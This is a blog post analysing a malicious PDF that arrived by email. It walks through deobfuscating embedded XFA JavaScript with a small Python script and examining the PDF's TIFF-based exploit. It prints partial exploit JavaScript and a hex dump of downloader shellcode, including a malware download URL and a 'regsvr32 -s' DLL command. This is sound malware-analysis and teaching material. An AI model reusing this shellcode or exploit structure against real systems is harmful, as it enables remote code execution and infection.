08 February 2012

Malicious PDF Analysis: Reverse code obfuscation

I normally don't find the time to analyze malware at home, unless it is somehow targeted towards me (like the prior write-up of an infection on this site). This last week I received a very suspicious PDF in an email that made it through GMail's spam filters and grabbed my attention.

The email was received to my Google Mail account and appeared in my inbox. It was easily accessible, but within two days Google did alert on the virus in the attachment and prevented downloading it. The email had one attachment, which could still be obtained as Base64 when viewing the email in its raw form: 92247.pdf.

A quick view in a hex editor showed that the file, only 13,205 bytes in size, included no obvious dropper, decoy, or even displayable PDF data. There was just one object of note, that contained an XML subform with embedded JavaScript. Boring...

Upon examining the JavaScript, I saw a large block of data that would normally contain the shell code, or even further JavaScript, to attack the victimized system. However, this example proved odd. There was a large block of such data (abbreviated below), but it contained all integer numbers that were between 0 and 74. This is not standard shell code.


So I started looking at the surrounding code:

    8 0 obj <</Length 325325>> stream <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
    <asd/>as<config xmlns='123'><asd/>
    <template xmlns='http://www.xfa.org/schema/xfa-template/2.5/'>
    a<subform name="a1"> <pageSet>
    <pageArea id="roteYom" name="roteYom">
    <contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
    <medium long="792pt" short="612pt" stock="default"/>
    <subform name='v236536b346b'>
    a<asd/>a<field name='qwe123b'>a<asd/>a<event activity='initialize'>
    <script contentTyp='application'
    cc={q:"var pding;b,cefhots_x=wAy()l1\"420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"}.q;

    if (aa==a){
    </subform><Gsdg/>a</template>a<asd/>a<xfa:datasets a='a' xmlns:xfa='http://www.xfa.org/schema/xfa-data/1.1' b='b'>
    <xfa:data><a1 test="123">
The first few things that popped out were obfuscated / escaped variable names. You can see a reference to "n" but nowhere where it is initialized. Instead, you see variables named "& # 000119;" and ""& # 000110;". These are the ASCII decimal values for "w" and "n" respectively. Additionally, mathematical operators, like "& lt;" are escaped as HTML "<". The big thing we look for is the "eval()" statement, and it is equally obfuscated as: x='e'; q=x + 'v'+'al';, making q = "eval".

But, what about that large block of data? And what is up with that unusual "cc" variable that contains a large list of characters. By analyzing the decoding "for" loop, you can see the meaning. The "cc" is actually the custom character set of the end result, and the large data block "arr" is a series of numbers that reference each individual character, each separated by a "@".

With this configuration, you can visually analyze the first few pointers:
0@1@2@3@4@1@5@5@6@7@8@9 equals "var padding;". Bingo. But, even with layer of obfuscation, a quick Python script makes short work of it:
    cc="var pding;b,cefhots_x=wAy()l1\"420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"
    for i in arr.split("@"):result += cc[int(i)]
    print result
When run, voila! Our obfuscated code:
    var padding;var bbb, ccc, ddd, eee, fff, ggg, hhh;var pointers_a, i;var x = new
    Array();var y = new Array();var _l1="4c20600f0517804a3c20600f0f63804aa3eb804a302
    578650000";var _l2="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141
    p;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.re
    place('.','');while(_l6.length<4)_l6+='0';return parseInt(_l6,10)}function _l7(_
    l8,_l9){while(_l8.length*2<_l9)_l8+=_l8;return _l8.substring(0,_l9/2)}function _
    0; i < 400; i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote;}function _I2(
    _I1,len){while(_I1.length<len)_I1+=_I1;return _I1.substring(0,len)}function _I3(
    tring.fromCharCode(c);}return ret}function _ji1(_I1,_I4){_I5='';for(_I6=0;_I6<_I
    9);_I5+=String.fromCharCode(_I7^_I8);}return _I5}function _I9(_I6){_j0=_I6.toStr
    ing(16);_j1=_j0.length;_I5=(_j1%2)?'0'+_j0:_j0;return _I5}function _j2(_I1){_I5=
    5+=_I9(_I1.charCodeAt(_I6))}return _I5}function _j3(){_j4=_l5();if(_j4<9000){_j5
With this type of output, I would typically use Malzilla to clean it up for exploit analysis. But, with the shell code in plain sight, I'll go right for the payload. There are actually two copies of the shell code, stored as "_l1" and "_l2", with a few slight differences between the two. The code is actually binary data stored as plaintext hex, where every two bytes equals the hexadecimal value for the binary character. Copying and pasting the data into a hex editor can convert it to binary.

Now, normally you would look for shellcode obfuscation and API resolutions with IDA Pro or a debugger like Immunity/OllyDbg, but this one is pretty straight forward. It's a simple downloader with the URL in plain text (Similar to a sample I demonstrated to TV's David McCallum... just saying ;)). When I view the data in my favorite free hex editor, HxD, I can see:
    Offset(h)00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

    00000000 4C 20 60 0F 05 17 80 4A 3C 20 60 0F 0F 63 80 4A L `...€J< `..c€J
    00000010 A3 EB 80 4A 30 20 82 4A 6E 2F 80 4A 41 41 41 41 £ë€J0 ‚Jn/€JAAAA
    00000020 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &...............
    00000030 12 39 80 4A 64 20 60 0F 00 04 00 00 41 41 41 41 .9€Jd `.....AAAA
    00000040 41 41 41 41 66 83 E4 FC FC 85 E4 75 34 E9 5F 33 AAAAfƒäüü…äu4é_3
    00000050 C0 64 8B 40 30 8B 40 0C 8B 70 1C 56 8B 76 08 33 Àd‹@0‹@.‹p.V‹v.3
    00000060 DB 66 8B 5E 3C 03 74 33 2C 81 EE 15 10 FF FF B8 Ûf‹^<.t3,.î..ÿÿ¸
    00000070 8B 40 30 C3 46 39 06 75 FB 87 34 24 85 E4 75 51 ‹@0ÃF9.uû‡4$…äuQ
    00000080 E9 EB 4C 51 56 8B 75 3C 8B 74 35 78 03 F5 56 8B éëLQV‹u<‹t5x.õV‹
    00000090 76 20 03 F5 33 C9 49 41 FC AD 03 C5 33 DB 0F BE v .õ3ÉIAü..Å3Û.¾
    000000A0 10 38 F2 74 08 C1 CB 0D 03 DA 40 EB F1 3B 1F 75 .8òt.ÁË..Ú@ëñ;.u
    000000B0 E6 5E 8B 5E 24 03 DD 66 8B 0C 4B 8D 46 EC FF 54 æ^‹^$.Ýf‹.K.FìÿT
    000000C0 24 0C 8B D8 03 DD 8B 04 8B 03 C5 AB 5E 59 C3 EB $.‹Ø.Ý‹.‹.Å«^YÃë
    000000D0 53 AD 8B 68 20 80 7D 0C 33 74 03 96 EB F3 8B 68 S.‹h €}.3t.–ëó‹h
    000000E0 08 8B F7 6A 05 59 E8 98 FF FF FF E2 F9 E8 00 00 .‹÷j.Yè˜ÿÿÿâùè..
    000000F0 00 00 58 50 6A 40 68 FF 00 00 00 50 83 C0 19 50 ..XPj@hÿ...PƒÀ.P
    00000100 55 8B EC 8B 5E 10 83 C3 05 FF E3 68 6F 6E 00 00 U‹ì‹^.ƒÃ.ÿãhon..
    00000110 68 75 72 6C 6D 54 FF 16 83 C4 08 8B E8 E8 61 FF hurlmTÿ.ƒÄ.‹èèaÿ
    00000120 FF FF EB 02 EB 72 81 EC 04 01 00 00 8D 5C 24 0C ÿÿë.ër.ì.....\$.
    00000130 C7 04 24 72 65 67 73 C7 44 24 04 76 72 33 32 C7 Ç.$regsÇD$.vr32Ç
    00000140 44 24 08 20 2D 73 20 53 68 F8 00 00 00 FF 56 0C D$. -s Shø...ÿV.
    00000150 8B E8 33 C9 51 C7 44 1D 00 77 70 62 74 C7 44 1D ‹è3ÉQÇD..wpbtÇD.
    00000160 05 2E 64 6C 6C C6 44 1D 09 00 59 8A C1 04 30 88 ..dllÆD...YŠÁ.0ˆ
    00000170 44 1D 04 41 51 6A 00 6A 00 53 57 6A 00 FF 56 14 D..AQj.j.SWj.ÿV.
    00000180 85 C0 75 16 6A 00 53 FF 56 04 6A 00 83 EB 0C 53 …Àu.j.SÿV.j.ƒë.S
    00000190 FF 56 04 83 C3 0C EB 02 EB 13 47 80 3F 00 75 FA ÿV.ƒÃ.ë.ë.G€?.uú
    000001A0 47 80 3F 00 75 C4 6A 00 6A FE FF 56 08 E8 9C FE G€?.uÄj.jþÿV.èœþ
    000001B0 FF FF 8E 4E 0E EC 98 FE 8A 0E 89 6F 01 BD 33 CA ÿÿŽN.ì˜þŠ.‰o.½3Ê
    000001C0 8A 5B 1B C6 46 79 36 1A 2F 70 68 74 74 70 3A 2F Š[.ÆFy6./phttp:/
    000001D0 2F 75 72 62 61 6E 2D 67 65 61 72 2E 63 6F 6D 2F /urban-gear.com/
    000001E0 34 30 34 5F 70 61 67 65 5F 69 6D 61 67 65 73 2F 404_page_images/
    000001F0 30 32 30 36 2E 65 78 65 00 00 0206.exe..
The URL is a dead giveaway. A well trained eye can see additional strings appear, typically as four bytes of op-code following by four bytes of a string, like: codeDATAcodeDATAcodeDATA (Why? Because it takes 4 bytes of code to say "move this 4-bytes of data into a memory register at X location"). A visual analysis shows the command line: "regsvr32 -s wpbt.dll", as well as a DLL call "urlmon" (practice looking for those). So, from this, we can tell some of the functionality. We know that it at least downloads an executable file from a remote server to the local temporary path (API call to GetTempPathA) and runs it, and that it also potentially instills a DLL into the system. A view from within IDA Pro would tell more, but I think I've reached enough text with this posting.

To really see what it's doing, I'd chop that code down to the actual functional code, which normally starts after the large block of nulls. In this case, it begins with a somewhat "NOP sled" of 0x4141414141414141. Extract the code and run it through Shellcode2Exe.py, then run the resulting application in OllyDbg. OllyDbg will then resolve the API calls as they're being made, letting you see the calls that include urlmon.URLDownloadToFileA().

That's basically it. A quick one-hour write-up from home using free tools on a malicious PDF sent to my personal account. The end result is pretty boring itself, but I found the JavaScript interesting and decided to publish a few steps for those who were possibly curious about how it worked.

(Pseudo) Exploit Analysis:
Based on a comment that was posted today, I went back to analyse the exploit of the PDF. Exploit analysis isn't my forte by a long shot, but I wanted to show the basic steps of how I did this file. Also, I was pointed to other blogs that featured this same type of sample, but tried to wave their magic wand of obscurity to say "we manually de-obfuscated it and found...". This isn't rocket science, no need to keep it secret... The magic occurred elsewhere in the PDF, in something we'll call "Object 18":

    18 0 obj
    <</Rect [12.47 5.21] /Subtype/Widget /Ff 65536 /T (qwe123b[0]) /MK <</TP 1>> /Type/Annot /FT/Btn /DA (/CourierStd 10 Tf 0 g) /Parent 19 0 R /TU (qwe123b) /P 1 0 R /F 4>> endobj
This object (which is called by 19, which is called by 20, which is called by 21, which is called by 23 (the root object))  draws a rectangle and loads a widget in it named "qwe123b[0]", which refers basically to the output of the JavaScript. So, let's go back to our deobfuscated JavaScript and work backwards:
There's our return value... _ll1. So, let's piece together what's returned:
_j8 is a standard block of text, "SUkqADggAABB".
_j9 calls I2() that makes a block of text that is "QUFB" 10,984 times.
_l10 is another standard block of text.
_j5 is another standard block of text.
So, I would combine all of these values to see what the output would be. The magic behind it all is that the large block of text this produces is simply a string of Base64 encoded data. Upon decoding, you'll see the magic first few bytes (from _j8):
    Offset(h)00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

    00000000 49 49 2A 00 38 20 00 00 41                       II*.8 ..A
These bytes refer to the file header of a TIFF graphic image. Oh, and those 10,984 "QUFB"'s? Those Base64 decode to "0x414141". That reduces our search. At this point, we would debug Acrobat to follow the flow of data through the application, setting breakpoints at areas that handle graphic images. But, as this isn't a 0-day, a few basic Google searches help lead us to a few possible culprits, all of which are basically libTiff vulnerabilities. There are numerous ones, but I don't feel that I'm qualified to pinpoint an exact one.

No comments:

Post a Comment